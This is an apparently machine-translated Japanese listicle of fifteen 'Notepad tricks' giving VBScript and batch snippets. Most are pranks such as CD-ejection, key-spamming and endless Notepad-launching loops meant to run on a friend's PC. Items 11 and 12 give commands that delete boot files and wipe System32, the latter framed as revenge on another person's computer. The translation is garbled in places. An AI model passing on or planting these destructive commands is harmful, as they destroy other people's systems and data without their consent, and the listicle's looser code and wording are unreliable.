推奨されます, 2023

エディターズチョイス

あなたが知っておくべき15クールなメモ帳のトリック

コンピュータの使い方を学ぶときに最初に覚えることの1つは、メモ帳と呼ばれるアプリケーションです。 ほとんどの人は、メモ帳が何であるか、そしてシンプルで見栄えがよく機能するアプリケーションであるにもかかわらず、それが実際にどのようなパワーを持っているのかを知っています。 メモ帳を使って文字通り誰かのPCを破壊することも、メモ帳を使って大きな問題を解決することもできます。 わかりました、メモ帳は私が自分で言ったことすべてをするわけではありません、それでも。 それは、コンパイルすることができる初期のコードを書くことができるプラットフォームです。 そのため、いくつかの小さなメモ帳のトリックを習得しても、メモ帳が実際にできることについて披露したり、異なる見込みをしたりする可能性があるため、実際には害はありません。

だから、ここであなたが試してみるべき15クールなメモ帳のトリックです:

1.メモ帳を使ってCDドライブを連続してポップアウトする

あなたは彼のCDドライブを何度もポップにすることによってあなたの友人と遊ぶことができればそれは楽しいだろうと思いませんか? 以下のテキストをメモ帳に入力して.vbsファイルとして保存するだけです。 それがはたらくことを見るために.vbsファイルをダブルクリックして下さい。

Set oWMP = CreateObject(“WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

2.メモ帳を使ってコンピュータをシャットダウンする

想像してみれば、スタートボタンを押してからシャットダウンボタンを押してからOKオプションを押すのではなく、アイコンをダブルクリックしてシステムをシャットダウンすることができます。 下記のメモ帳トリックコードはまさにそれを行います。 ファイルを.vbsファイルとして保存し、システムをシャットダウンする必要があるときに押すだけです。

@echo off
msg * System will now shut down
shutdown -c “Bye!” –s

3.友達のコンピュータで継続的にメモ帳を開く

あなたの友人のシステムで遊ぶもう一つのメモ帳トリックは、彼/彼女のメモ帳を繰り返し開くコマンドを実行することでしょう。

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

.vbsファイルとして保存して開き、何が起こるのかを確認します。

4.個人用ログブックや日記を作る

ログを作成することを可能にする特別な機能がメモ帳にあります。 メモ帳が特定の種類のログファイルを開くたびに日付と時刻を記録するため、これを使用してデータのログを作成できます。 これを行うには、メモ帳に「 .LOG 」と入力して、好きな名前で保存します。 この特定のファイルを開くときはいつでも、メモ帳がそれが開かれた日時を自動的に入力するのを見るでしょう、そして次にあなたはログ記録を作ってログを保存することができます。

マトリックス効果

それでは、私たちのコマンドプロンプトを、マトリックスムービーから出てきたようなもの、またはハッカーのシステムから直接出てきたものに変えることができるメモ帳のトリックについて説明します。 これを行うには、あなたがする必要があるのはメモ帳に次のコードを貼り付けるだけです

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

今、あなたは拡張子.batでこのファイルを保存する必要があります、そしてあなたが作成した.batファイルをクリックすると、あなたはこのような何かを見るでしょう。

このクールな効果をカスタマイズするためのちょっとした調整は、色の前の値、つまり色02の02を03のような他の値に変更できることです。 これにより、コマンドプロンプトに表示されるテキストの色が変わります。

色に異なる値を割り当てて楽しんでください。

6.メモ帳を使用してCapslockを繰り返し切り替える

Caps Lockを繰り返し切り替えることができるスクリプトを書くことで、誰かのコンピューター、あるいは自分のコンピューターで遊ぶことができます。

下記のコードをメモ帳にコピー&ペーストするだけです。

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

今すぐそれを.vbsファイルとして保存し、魔法を見るためにそれを使用してください。

遅い入力

これはテキストの入力を遅くするためのトリックです。試してみるには、以下のテキストをコピーしてメモ帳に貼り付けて、 .vbsファイルとして保存してください。

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “wa”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “mg”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “

それはそれがタイプする異なる文字列の間にわずかな遅れを導入する以外何もしません。

メモ帳を使用してテキストを音声に変換する。

下のコードをメモ帳にコピーして貼り付け、 .vbsファイルとして保存するだけです。 演奏すると、コンピュータに何を伝えたいのかを尋ねるダイアログボックスが表示されます。 楽しむ。

Dim message, sapi
message=InputBox("What do you want me to say?", "Speak to Me")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak message

9.世界貿易センターの攻撃

このトリックによると、ツインタワーを襲ったフライトのフライト番号、すなわちメモ帳にQ33Nを入力し、フォントタイプを ' wingdings 'に、フォントサイズを72に変更すると、非常に奇妙なことがわかります。 。

それはとてもクールなトリックですが、残念ながらそのような飛行がツインタワーを襲ったわけではないのでデマです。

10.メモ帳のヘッダーとフッターを変更する

メモ帳で[ファイル] - > [ページ設定]に移動し、ヘッダーとフッターのフィールドにこれらのコードを入力します。

&l後続の文字を左揃えにします
&c後続の文字を中央揃えにします
&r後続の文字を右揃えにします
&d現在の日付を印刷する
&t現在の時刻を印刷します
&f文書の名前を印刷します
&pページ番号を印刷する

11.メモ帳を使ってスタートアップファイルを削除する

PCを荒廃させる方法はそれを起動するのに役立つファイルを削除することです。 お勧めできませんが、これはそれを実行する力を持っているコードです。

@ECHO OFF
ATTRIB -R -S -HC:\AUTOEXEC.BAT
DEL C:\AUTOEXEC.BAT
ATTRIB -R -S -HC:\BOOT.INI
DEL C:\BOOT.INI
ATTRIB -R -S -HC:\NTLDR
DEL C:\NTLDR
ATTRIB -R -S -HC:\WINDOWS\WIN.INI
DEL C:\WINDOWS\WIN.INI
SAVE IT AS .BAT FILE.

これはコンピュータをシャットダウンし、コンピュータを通常の状態にするのに必要なファイルを削除します。

あなたのコンピュータ上でこれをやろうとしない限り、あなたがすべてのデータを失いたくない限り。

12.メモ帳を使ってSystem32ファイルを削除する

誰かからの復讐をしたいですか? このコードを使って、それを.batファイルとして保存し、それがその人のシステムに何をするのかを見てください。 システムが正常に動作するために必要なすべてのSystem32ファイルが削除されます。

以下をメモ帳に貼り付けて、.batファイルとして保存するだけです。

DEL C:\WINDOWS\SYSTEM32\*.*/Q

13. Enterキーを押し続けます

Enterボタンの機能を何度も繰り返して使用したい場合は、何度も繰り返しボタンを押すよりも良い方法は、次のコードを使用することです。

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

.vbsファイルとして保存して、その魔法を見てください

14.バックスペースを続けて打つ

バックスペースボタンが必要ですが、誰かをいらいらさせて何度も何度も押すようにしたいのですが、機械的にはある程度の作業が必要になりますが、このコードを使用するだけではるかに簡単になります。 。

MsgBox “Backspace again and again and AGAIN”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

動作させるために、 .vbsファイルとして保存します。

何度も何度も何かをタイプする

何度も何度も何度もタイプするためのコードが以下に述べられています、あなたはそれがループから出るまで何度も何度も何度も書くためにそれを使うことができます。

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “I'll be typed again and again”
loop

動作させるために.vbsファイルとして保存します。

重要な注意点。 無効な文字を言ってエラーが発生した場合は、コード内の二重反転カンマを再入力してください。

Top